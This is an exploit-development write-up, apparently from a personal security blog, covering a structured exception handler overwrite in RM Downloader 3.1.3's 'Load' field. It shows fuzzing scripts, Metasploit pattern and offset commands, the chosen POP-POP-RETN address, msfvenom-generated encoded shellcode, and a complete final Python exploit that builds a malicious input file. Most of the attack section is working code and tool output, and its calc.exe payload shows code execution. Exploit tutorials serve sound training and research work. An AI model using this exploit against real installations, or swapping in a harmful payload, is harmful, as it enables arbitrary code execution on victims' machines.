RM Downloader 3.1.3 - 'Load' Structured Exception Handling Overwrite

[Kev]

Preamble

The other day, i was gathering through Exploit-DB as usual, when i came across with this exploit, interested, i was eager to know if i could find a vulnerability. As a result of my success, i will explain the finding.

 

The Bug

RM Downloader suffers from a Buffer Overflow and a Structured Exception Handling Overwrite when inputting long strings within the ‘Load’ parameter.

 

A small fuzzing script is generated:

import struct 

buffer = "A" * 10000
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

Once the script is executed, the file is created:

 

In order to crash the application with the generated bytes, open the ‘Load’ tab, and paste the contents within the ‘Load’ parameter:

 

Once this is done, click OK. Two additional messageboxes may appear, just click OK.

 

After this is done the application successfully crashes:

 

Voila! The EIP has been successfully written. Moreover, the SEH Chains has suffered from an overwrite as well:

 

This application could easily be exploited with the use of a JMP/CALL ESP or PUSH ESP, RET. However, as like SEH Overwrites more, i will perform one on this case.

 

A pattern is generated and saved into a file named “pattern”:

root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern 
root@whitecr0wz:~/Exploit-Dev# 

The contents of the file “pattern” are copied and pasted within the ‘Load’ parameter, repeting the process:

 

After the SEH Chain values have been overwritten, the nSEH value is copied:

 

The offset is calculated with msf-pattern_offset:

root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000 
[*] Exact match at offset 9008
root@whitecr0wz:~/Exploit-Dev# 

The PoC is updated:

import struct 

buffer = "A" * 9008 + "BBBB" + "CCCC"
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC):

 

Good, in an escenario like this, a 3-byte SEH Overwrite could be performed, in case there are no available addresses without a NULL-byte.

The modules are listed:

 

As seen, the module RDfilter03 does not have any kind of protections/mitigations. Moreover, the base address does not contain a NULL- byte.

Listing the POP-POP-RETN sequences:

 

The first address (0x10031779) was chosen.

The PoC is updated:

import struct 

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779)

buffer = "A" * 9008 + nseh + seh + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

After repeating the process, the SEH Chain values are overwritten as expected:

 

After pressing SHIFT+F9 (Run), the additional bytes are executed:

 

 

Shellcode is generated:

root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 448 (iteration=0)
x86/alpha_mixed chosen with final size 448
Payload size: 448 bytes
Final size of py file: 2188 bytes
buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

 

EndGame

 

Final Code:

import struct 

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779)

buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

 

Source: hwhitecr0wz.github.io